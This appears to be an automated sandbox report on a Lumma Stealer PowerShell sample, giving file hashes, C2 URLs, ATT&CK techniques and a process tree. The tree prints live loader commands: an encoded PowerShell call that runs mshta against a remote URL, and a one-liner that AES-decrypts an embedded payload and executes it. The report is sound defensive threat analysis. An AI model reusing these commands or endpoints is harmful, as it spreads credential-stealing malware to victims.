lumma | d808c118c79794569869cf92a8bbcb60ed29b2815282f048da66a7ecc4e254bd

General

Target

pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev.ps1
Size

195B
MD5

6b7cba6b3b995c043af8b5901e56db8d
SHA1

b09cb6c73808259ccef2af9a9510c6f69a73f6fa
SHA256

d808c118c79794569869cf92a8bbcb60ed29b2815282f048da66a7ecc4e254bd
SHA512

2c0dc1824fc8e8ac2d4ba70287be4cdefb1158cb1e0bc49f739102088b07994cf2ffd4599ef169509e2a27bb8353bbffe98cb3cafbe9089df61dc69d9d762059

Score

10^/10

lumma discovery execution stealer

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/scptst24

Extracted

Family

lumma

C2

https://scenarriotdpq.shop/api

https://locatedblsoqp.shop/api

https://traineiwnqo.shop/api

https://condedqpwqm.shop/api

https://millyscroqwp.shop/api

https://stagedchheiqwo.shop/api

https://stamppreewntnq.shop/api

https://caffegclasiqwp.shop/api

https://tenntysjuxmz.shop/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma

Blocklisted process makes network request 5 IoCs

flow	pid	Process
7	1520	mshta.exe
9	1520	mshta.exe
11	1520	mshta.exe
15	784	powershell.exe
17	784	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
1448	AutoIt3.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
784	powershell.exe
404	powershell.exe

Command and Scripting Interpreter: AutoIT 1 TTPs 1 IoCs

Using AutoIT for possible automate script.

execution

AutoHotKey & AutoIT

T1059.010

pid	Process
1448	AutoIt3.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1448 set thread context of 312	1448	AutoIt3.exe	83

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AutoIt3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GoogleUpdateCore.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoIt3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoIt3.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
404	powershell.exe
404	powershell.exe
404	powershell.exe
1756	powershell.exe
1756	powershell.exe
1756	powershell.exe
784	powershell.exe
784	powershell.exe
784	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	404	powershell.exe
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeDebugPrivilege	784	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 404 wrote to memory of 1756	404	powershell.exe	76
PID 404 wrote to memory of 1756	404	powershell.exe	76
PID 1756 wrote to memory of 1520	1756	powershell.exe	77
PID 1756 wrote to memory of 1520	1756	powershell.exe	77
PID 1520 wrote to memory of 784	1520	mshta.exe	78
PID 1520 wrote to memory of 784	1520	mshta.exe	78
PID 784 wrote to memory of 1448	784	powershell.exe	80
PID 784 wrote to memory of 1448	784	powershell.exe	80
PID 784 wrote to memory of 1448	784	powershell.exe	80
PID 1448 wrote to memory of 3024	1448	AutoIt3.exe	81
PID 1448 wrote to memory of 3024	1448	AutoIt3.exe	81
PID 1448 wrote to memory of 3024	1448	AutoIt3.exe	81
PID 1448 wrote to memory of 1856	1448	AutoIt3.exe	82
PID 1448 wrote to memory of 1856	1448	AutoIt3.exe	82
PID 1448 wrote to memory of 1856	1448	AutoIt3.exe	82
PID 1448 wrote to memory of 312	1448	AutoIt3.exe	83
PID 1448 wrote to memory of 312	1448	AutoIt3.exe	83
PID 1448 wrote to memory of 312	1448	AutoIt3.exe	83
PID 1448 wrote to memory of 312	1448	AutoIt3.exe	83
PID 1448 wrote to memory of 312	1448	AutoIt3.exe	83

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAHAAdQBiAC0AOQBjADQAZQBjADcAZgAzAGYAOQA1AGMANAA0ADgAYgA4ADUAZQA0ADYANABkADIAYgA1ADMAMwBhAGEAYwAxAC4AcgAyAC4AZABlAHYALwBzAGMAcAB0AHMAdAAyADQA
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1756
- - C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/scptst24
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function mJjew($XWbcyeAR){return -split ($XWbcyeAR -replace '..', '0x$& ')};$KDiuaBX = mJjew('6CDA6AEF75279B911F4AF5F3F0EB77F91EDA5AF7F2902F230F33557872848F59E1252944F34B87EBFF5291655C9E99F7F3CA3EBF970CC5459589F88184E64BBCC7ECD695C012040090BFDAF050E00A6C84C54D3022CD9D9960C2A86B5D9121D271C775945B2A2C31397813906C3C99ECAA9756FC219C72423C5148C778E0770711FD1EF77A37E479D78488384A6F67F6E8766D618F5D485CFCA5467C873A91FA3846A7735534E22BB366997D7B16FC0136F22C048CF44C3869E1DF1DF7FE558EE054F01C34F24CB73B27FA8180B8C9953A3DE6DF1EE8BE25F8BE532FB47271F901F3BFBAE223DFFDCEB048B71BE521745A440B62DDDBD85234C973632DC4C678345046DA4B99C48247D319CCDF0695B9912ADB6720EEC8A078D4C25A8CD01303ABFDF577C37AAB536224C1C5B4815C928AB514B901167ECD782316D67A70CD3E844B58D92E9D8F7E66FF2AAE7EC0356C21484D5EA297655256866214750E325202D51E5852A7727D35C432B18F387EA1C1D5E2B93ABFF7A98FCFAE0D637A3AD254A17C39555D2DC8BA74CD81BDED98ADD96EA9E9C410DF90D2C1EBFB6317B1BD6B1C781E8D3D8DCB07A2C83BD6DEFCECAE84405E659B745A7DC5A0DB420629B7A9F0272E87DFECFECB79D1E768BD0109683774135715BF7BC739FBDD6F681FF1E117ED435A9E687664C054BAB3D8A0B78A3D0DEE6366B83042C71D6445CC2122E4BF536C843E522D1F5F272FE474E2FE55FC601C2EE8574AEB07C41BEC86F4A1391C512B9768D24F4C6E70D564E703C1C37BCDEBB8C928537DCC4D34C7895951637488AEBCA390D2A8589B3D8A1B9653CFB9CFDDA9EA60A856CA728E4B17702104EACF59B9545C266BB4343FF429135F25BEE788C1AA79F8719CE23DC7E01CB8DE46E3337B029A0EB9B85040AD8CBD34E63E8EED32629015AF5B8755DAF677EEF8D9257D5AA72606C5CB4CFAA956D41BF7632B64622FB67CEF626546AAA61A31DBFE410A9935F18E10E11A5AF59E875E5C721124D3696995E9AE6DD55E79B4F567D9B59CDBEB005EBEE84C7B0C0AB105631BB9875B32F3EA76EA0D79BE345708ADFC46CC5F00E9A071BB7E8153B7F54BEC601A2E633232F5D084301CED18873B4C1E052DA95D79B8F3DC9E76AFD3443945C1F1AA4FC862DA32A1445FE17E6515E403737BBB8B5448BEB49ECDD794CEE9324870D803C15AC203CD047F004EFFEAF51970AF0C1A8F020DC752A29DC19D137073FB73F7A42DC342462A67E9D2643631DD5A090B36D65B3640A72CF83180AB391B8A0C1A5A36D18C0351F2F79B419A760170DD4177906320A63C2B47E445B7C3969564D6B78FB48949CFD1EBA19CA969DF1156F564856DBFE86A5F99EDF201481B16CB3FAFFE6AE65754248E5AFF40E2ECB90186EC0D415CEEA2C4C4B0B84D974599589B580F1C861156C9F153CC2BC179C467C6B0E8FCBBB97DC87A3D8DAC2DEEA1267599E6F357AC03CF3FD3ECA7CB8A603061D2DB4F401ADD4EF46F07DD0E65291493B38D4E912DC50EC59231EDE0D0329E97D7A1EEB115388F8FEFBC33F67645CEADF1E200D5676EE90CB909338BCED8D9C46E17EA47304C1A7975F301315585683CC93A085BE8502D47A7D8B835BB0451E68E3B41A206866E4883EC7623D9E6FFB90B4512991BBD4F1E1182B9EF9BA96485CD4ADC637B8EAAA5C1BCE7DEC68590F181A227BE2352D617D09F23681142A8E47C67462503D3E3B179EB21352F14F0C62A1C9A6A6BD80ACD9B9412495A5F323C9FEC0426EBA50623FD2F9BD8EE1D8D268C96B3F167E909A5E9B1BB25BA1F229E37DC21B62485AC8D7DA83EBE875176820583C1054885995DD2A97989B5F36740FC2D88249B5A8D3D949F1F6D8DC99D6C95442E887ED9DA1971D44D5B74C865E2CE2C25F609CFB114D12FE619D32A436C64507C76595D348989CBE82823F0A8518FC1785DB6404C0A3732E4EF57213DA7D8882A61AC6A82FFA5270D38D7414CFA04211FDF59160902599B359A4B5A7C8DABACCE552C4AEA5AABE83CEA7CF47B02A63F9F549CA34941E447C70871E7765C7AE8CE116F8FCD2D152BBF80C72CAD426DE100AAA3B97EB77179E9E3585469D078845027437A50AF6B5B59598D6E4C8FC809A18D2B534E83D821A1C8E552ECDDED2CEC2D02FD392AADA156');$zkpBU = [System.Security.Cryptography.Aes]::Create();$zkpBU.Key = mJjew('57776E666D4356764953456F63727248');$zkpBU.IV = New-Object byte[] 16;$NpgbfLfk = $zkpBU.CreateDecryptor();$eVvkfgWNq = $NpgbfLfk.TransformFinalBlock($KDiuaBX, 0, $KDiuaBX.Length);$kCRpAnbJE = [System.Text.Encoding]::Utf8.GetString($eVvkfgWNq);$NpgbfLfk.Dispose();& $kCRpAnbJE.Substring(0,3) $kCRpAnbJE.Substring(3)
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:784
    - - C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe" C:\Users\Admin\AppData\Local\Temp\script.a3x
        5⤵
        Executes dropped EXE
        Command and Scripting Interpreter: AutoIT
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious use of WriteProcessMemory
        
        PID:1448
      - C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
        6⤵
        
        PID:3024
      - C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
        6⤵
        
        PID:1856
      - C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:312

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

AutoHotKey & AutoIT

1

T1059.010

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
754e55a4dda7eed38e4dd3d2408709ad

SHA1
280bcf6fbb7e727973031606b2dc9d38f778fe5d

SHA256
2f0a33306e9a95a082a2f4b45dfae1e03060e7f4c9a821cfbaa9d486eb324fb2

SHA512
8b3576161285a172920937927cf966e9c290c55246cb7514d4bcf483d50fe9081a4a4bc7a70c89623690aed00cb823a002a0392ed393343209b617f328160e9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pvdeliap.lat.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\script.a3x

Filesize
479KB

MD5
02c00d9ae8f58dc9d1cc5b6bb18bcffc

SHA1
378666d04266477aa92cf0abd5e5e4f3f3c6cead

SHA256
569728aad7692c31eca3dd20fa816c676d29381f748b0db5997bd0c64747dfcd

SHA512
f281fb830b9b67b3fd5fedb2bd6c3f02d949dcaff153ac5296f2baa6096fc8d667c75f93fd48a7d0723074f124d6a7f41dbc9eb39409e87db6c7d1eb6f84fa3c

Download Submit
memory/312-148-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/312-147-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/404-49-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

Filesize
9.9MB

Download
memory/404-3-0x00007FFE770D3000-0x00007FFE770D4000-memory.dmp

Filesize
4KB

Download
memory/404-10-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

Filesize
9.9MB

Download
memory/404-9-0x00000140B5EB0000-0x00000140B5F26000-memory.dmp

Filesize
472KB

Download
memory/404-8-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

Filesize
9.9MB

Download
memory/404-5-0x00000140B5D80000-0x00000140B5DA2000-memory.dmp

Filesize
136KB

Download
memory/784-100-0x0000025BDA6A0000-0x0000025BDA6B2000-memory.dmp

Filesize
72KB

Download
memory/784-113-0x0000025BDA680000-0x0000025BDA68A000-memory.dmp

Filesize
40KB

Download
memory/1756-27-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

Filesize
9.9MB

Download
memory/1756-43-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

Filesize
9.9MB

Download
memory/1756-26-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

Filesize
9.9MB

Download
memory/1756-25-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

Filesize
9.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads